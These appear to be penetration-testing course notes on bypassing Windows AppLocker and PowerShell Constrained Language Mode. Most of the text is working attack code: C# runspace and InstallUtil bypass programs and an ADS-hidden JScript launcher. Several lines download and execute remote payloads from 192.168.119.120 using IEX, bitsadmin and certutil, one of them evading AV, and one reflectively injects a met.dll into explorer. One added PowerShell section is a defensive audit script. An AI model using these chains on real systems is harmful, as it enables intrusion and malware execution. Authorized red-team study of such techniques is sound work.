Method 1 (Trusted Folders)
- Copy the program into a folder inside a trusted path where every user can both write and execute.
Check for writable folders (-w write access, -u suppress errors, -s recurse):
accesschk.exe "student" C:\Windows -wus
Check whether the folders returned above are also executable:
icacls.exe c:\Windows\Tasks
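Added example, not part of the original notes: a PowerShell audit that lists directories under the trusted path which a standard user can both write to and execute from, so each one can be covered by an explicit AppLocker path exception or a tightened ACL. It assumes the default C:\Windows rule; the identity list and the right bits it tests are my choices, and explicit Deny ACEs for those identities are subtracted before the check.

```powershell
# Added example (not from the original notes): audit a trusted path for
# directories a standard user can both write to AND execute from. Any hit
# weakens the default "Allow everything under %WINDIR%" rule and should get
# an AppLocker deny/exception rule or a tighter ACL.
$Root = 'C:\Windows'                          # assumption: default trusted path

# Principals every interactive standard user is a member of (assumed list).
$LowPrivIdentities = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'Everyone', 'NT AUTHORITY\INTERACTIVE'
)

$FSR         = [System.Security.AccessControl.FileSystemRights]
$WriteBits   = [int]($FSR::CreateFiles -bor $FSR::CreateDirectories)  # can drop a file
$ExecuteBits = [int]$FSR::ExecuteFile                                 # can run it

function Test-UserWritableExecutable {
    param([string]$Path)
    try   { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop }
    catch { return $false }                   # unreadable ACL: not a standard-user hit

    $allowed = 0; $denied = 0
    foreach ($ace in $acl.Access) {
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if ($ace.AccessControlType -eq 'Allow') { $allowed = $allowed -bor $rights }
        else                                     { $denied  = $denied  -bor $rights }
    }
    # Deny ACEs win over Allow ACEs, so strip denied bits first.
    $effective = $allowed -band (-bnot $denied)
    return ((($effective -band $WriteBits) -ne 0) -and
            (($effective -band $ExecuteBits) -ne 0))
}

# Walk the trusted path and report every directory that fails the check.
$hits = Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue |
    Where-Object { Test-UserWritableExecutable $_.FullName } |
    Select-Object -ExpandProperty FullName

"{0} user-writable+executable directories under {1}:" -f @($hits).Count, $Root
$hits
```

Known defaults such as C:\Windows\Tasks and C:\Windows\Temp will appear; the output is the list to feed into AppLocker path exceptions or to remediate with icacls.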
Method 2 (Unmanaged DLLs)
- Bypass with unmanaged DLLs loaded through rundll32 ($Path.dll is a placeholder for the DLL path, run is the exported entry point):
rundll32 $Path.dll,run
Method 3 (Alternate Data Streams)
- Alternate Data Streams
Create a JScript file test.js:
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
- Write the file into an alternate data stream of the TeamViewer log file (the redirection is required; without it, type only prints both files):
type test.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12.log:test.js"
- If the log file is opened by double-clicking, only the main stream is shown.
- But if we execute the stream with wscript from the command prompt, the JScript runs:
wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12.log:test.js"
Method 4 (Third Party Execution)
- Use Perl or Python if installed
Method 5 (Bypassing with Powershell CLM)
- PowerShell Constrained Language Mode
There are three levels:
- Full Language
- No Language
- Restricted Language
Constrained Language mode is enabled when AppLocker is in use.
It restricts .NET, exe and reflective execution.
The current mode is stored in $ExecutionContext.SessionState.LanguageMode; check it like this:
$ExecutionContext.SessionState.LanguageMode
Method 5.1 (Custom Runspaces)
- PowerShell uses System.Management.Automation.dll to create a Runspace.
We can use its public APIs to create a custom runspace from .NET and bypass CLM.

Check Video 6.3 (Bypassing Applocker with Powershell) for how to create the project and add the System.Management.Automation reference.
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            // Custom runspace: runs in FullLanguage regardless of the console's CLM setting
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            String cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath C:\\Tools\\test.txt";
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}
- Compile the above program in Release mode.
- Copy it to a directory we can execute from.
- Check the output file for possible privilege escalations.
Method 5.2 (InstallUtil)
We don't need to bypass AppLocker here: InstallUtil.exe itself is executed from the trusted .NET folder.
We use the Uninstall method because Install requires admin rights.
Reference needed: System.Configuration.Install
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            // Never reached via InstallUtil; only runs if the exe is started directly
            Console.WriteLine("This is the main method which is a decoy");
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        // InstallUtil /U calls this method
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}
- Compile it and execute it like this:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Tools\Bypass.exe
Another way to get the binary past AV onto the target (LOL): encode it with certutil on the attacking side
certutil -encode C:\Users\Offsec\source\repos\Bypass\Bypass\bin\x64\Release\Bypass.exe file.txt
type file.txt
Download and decode it on the target with:
bitsadmin /Transfer myJob http://192.168.119.120/file.txt C:\Users\student\enc.txt
certutil -decode enc.txt Bypass.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\student\Bypass.exe
- Combining the steps into one line:
bitsadmin /Transfer myJob http://192.168.119.120/file.txt C:\users\student\enc.txt && certutil -decode C:\users\student\enc.txt C:\users\student\Bypass.exe && del C:\users\student\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\student\Bypass.exe
Method 5.3 (Reflective Injection Returns)
Same runspace program as Method 5.1, with the script replaced by:
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.119.120/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
Method 6 (Bypassing Applocker with C#)
System.Workflow.ComponentModel.dll
- Run dnSpy as administrator and load the DLL.
- We need to focus on the System.Workflow.ComponentModel.Compiler namespace.
- Within it, look at the WorkflowCompiler class, which has a Compile method.